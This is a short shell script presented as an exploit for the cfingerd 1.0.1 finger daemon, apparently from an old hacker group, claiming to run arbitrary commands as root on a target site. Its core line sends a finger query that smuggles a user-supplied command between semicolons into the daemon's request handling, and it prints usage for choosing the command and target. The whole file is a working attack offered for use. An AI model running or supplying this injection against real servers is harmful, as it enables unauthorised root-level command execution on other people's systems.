# this exploits cfingerd 1.0.1
# l0ck r0x w1f gl0x
# written by east <east@l0ck.com>  
# execute arbitrary commands as root.

echo "l0ck r0x w1f gl0x"

if [ $# = 2 ]
then
  finger "/W;$1;#@$2"   
else
  echo "$0 \"<command>\" <sitename>"
fi

